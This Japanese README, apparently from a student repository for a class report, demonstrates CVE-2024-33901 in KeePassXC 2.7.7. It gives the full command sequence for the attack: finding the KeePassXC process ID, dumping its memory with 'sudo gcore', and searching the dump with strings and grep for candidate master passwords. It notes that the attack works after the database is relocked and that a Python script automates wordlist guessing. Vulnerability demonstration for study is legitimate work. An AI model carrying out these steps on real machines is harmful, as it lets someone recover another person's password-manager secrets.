
脆弱性CVE-2024-33901を実証するKeePassXCバージョン2.7.7用の短いプログラム
KeePassXC バージョン 2.7.7 における脆弱性 CVE-2024-33901 を実証する短いプログラムです。
授業のレポートではソースコードへのリンクが必要になるかもしれないため、このリポジトリを作成しました。
これは PID を取得することで実現できます。次のコマンドで取得できます。
ps aux | grep keepassxc
そして、次のコマンドを実行します: sudo gcore -o keepassxc_dump PID_HERE
例えば、取得した PID が 1234 の場合、コマンドは次のようになります。
sudo gcore -o keepassxc_dump 1234
3. 最後に、次のコマンドを実行できます: cat keepassxc_dump.PID_HERE | strings | grep "password guess here"
PID が 1234 の場合、コマンドは次のようになります。
cat keepassxc_dump.1234 | strings | grep "password guess here"
メモリダンプファイルが作成されると、データベースが再ロックされたり、KeePassXC が閉じられた後でも攻撃を実行できます。
提供されている Python コードはこれらの手順をすべて実行し、提供されたテキストファイルに基づいて複数のパスワード推測を試みます。